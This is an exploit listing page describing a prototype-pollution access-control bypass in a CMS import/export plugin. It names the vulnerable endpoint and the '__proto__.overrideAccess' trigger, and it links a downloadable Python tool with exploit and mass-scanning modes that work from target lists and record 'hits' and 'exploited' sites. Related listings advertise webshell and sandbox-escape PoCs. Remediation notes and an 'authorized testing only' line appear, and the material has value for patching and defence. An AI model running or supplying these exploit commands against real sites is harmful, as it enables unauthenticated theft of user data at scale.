CVE-2026-105844 — Payload CMS Import/Export Plugin Prototype Pollution → ACL Bypass
October 7, 2026 · 97 views
Payload CMS + @payloadcms/plugin-import-export ≥3.0.0 <3.88.0: POST /api/exports/export-preview fields __proto__.overrideAccess pollutes Object.prototype via getSelect() → overrideAccess on later REST ops, unauthenticated data leak (app-dependent RCE). CWE-1321, CVSS 4.0 9.3 Critical. Fixed 3.88.0 / 4.0.0-canary.27. Python PoC: check/exploit/mass -j, hits.txt & exploited.txt.
Description
Overview
CVE-2026-105844 — Payload CMS with @payloadcms/plugin-import-export — prototype pollution (CWE-1321) leading to access-control bypass and unauthenticated API data leak (impact may extend to RCE depending on app code). CVSS 4.0 9.3 Critical.
| | |
|---|---|
| Affected | Payload / plugin ≥ 3.0.0 < 3.88.0; canary < 4.0.0-canary.27 |
| Fixed | 3.88.0, 4.0.0-canary.27 |
| Endpoint | POST /api/exports/export-preview (default exports slug; override with --exports-slug) |
| Trigger | fields path __proto__.overrideAccess via vulnerable getSelect() |
Only sites with the Import/Export plugin enabled are in scope. Payload alone is not sufficient.
PoC page: https://pocbit.org/pocs/cve-2026-105844
GitHub: murrez/CVE-2026-105844
CVE.org: CVE-2026-105844
GHSA: GHSA-qf28-8hc6-vwrp
Mechanism (summary)
handlePreviewcallsgetSelect(fields)whenfieldsis non-empty.- Vulnerable
getSelectwalks dot-paths; segment__proto__attaches toObject.prototype. __proto__.overrideAccesssetsObject.prototype.overrideAccess = true.- Later Payload merges inherit
overrideAccess: true→ unauthenticated REST reads/writes.
Patched code rejects __proto__, constructor, prototype and returns Invalid field path.
Bundled tool (Python 3)
Download cve-2026-105844.py — writes poc.py, requirements.txt, targets.example.txt.
python cve-2026-105844.py
pip install -r requirements.txt
python poc.py -u https://cms.example --mode check
python poc.py -u https://cms.example --mode check --aggressive
python poc.py -u https://cms.example --mode exploit --collection users
python poc.py --list targets.example.txt --mode check -j 20
python poc.py --list hits.txt --mode exploit -j 10
Check: endpoint reachable + pollution path not blocked. --aggressive: compares GET /api/{collection} doc count before/after pollution.
Exploit: pollute → GET /api/users (or --collection) → docs leak.
Outputs: hits.txt, exploited.txt, cve_2026_105844_*.jsonl.
Options: --exports-slug, --collection (repeatable), --pollution-path.
Discovery hints (your assets only)
Tier 1 Payload fingerprints, tier 2 import-export hints (plugin-import-export, export-preview, /admin/collections/exports). Always confirm with check — patched versions and disabled plugins false-negative.
Remediation
- Upgrade to Payload 3.88.0+ (or 4.0.0-canary.27+).
- Until patched: disable import-export plugin or block
/api/*/export-previewat the edge.
Legal and ethical use
Authorized security testing only.
References
Related PoCs
Same platform, vendor, or tags — explore more write-ups on Pocbit.
- Web appCVE-2026-101894critical
CVE-2026-101894 — @xhmikosr/decompress Symlink-Chain Archive Path Traversal
Node.js @xhmikosr/decompress (and unmaintained decompress): read/write outside output dir via chained symlink archive entries — bypass of CVE-2026-53486 hardening. Fixed in 10.2.2 / 11.1.4; kevva decompress ≤4.2.1 unpatched. CVSS 3.1 9.1 Critical. Python PoC: --lab, lockfile check, evil.tar upload exploit, mass -j.
- Web appCVE-2026-85520critical
CVE-2026-85520 — PrestaShop gmfeed (MyPresta) Unauthenticated Arbitrary File Write → RCE
Google Merchant Center Feed (gmfeed) for PrestaShop ≤2.3.9: unauthenticated arbitrary file write on modules/gmfeed/feed.php when Save-to-file / URL export is enabled — attacker controls filename, path, extension, and body → PHP webshell → RCE. CVSS 9.3 Critical. Fixed in 2.3.10+ (2.4.1+ recommended). Python PoC: check, aggressive probe, exploit with marker stub, mass --list -j.
- Web appCVE-2026-82531critical
CVE-2026-82531 — Smarty Template Cache Poisoning RCE (SmartyNocache / extends)
smarty-php/smarty <4.5.8 and 5.0.0–5.8.4: extends/inheritance + cache regen with null nocache_hash lets forged assign() data inject SmartyNocache markers into cache PHP → include() RCE. CWE-94, CVSS 4.0 9.2 Critical (AT:P). Fixed 4.5.8 / 5.8.5. Python PoC: check/exploit/payload, Docker lab 5.8.4, hits.txt & exploited.txt. Marker POCBIT-82531-OK.
- Web appCVE-2026-100721critical
CVE-2026-100721 — vm2 NodeVM External Allowlist Bypass (Sandbox Escape)
Incorrect authorization (CWE-863) in vm2 npm before 3.12.2: NodeVM external allowlist and resolver path checks allow colliding package names (evil-left-pad) or prefix path tricks → host-context require and sandbox escape / host RCE when embedders run untrusted JS with require.external + custom resolve. CVSS 9.0/9.5 Critical. Python PoC: --lab (Node), check, remote exploit, mass -j.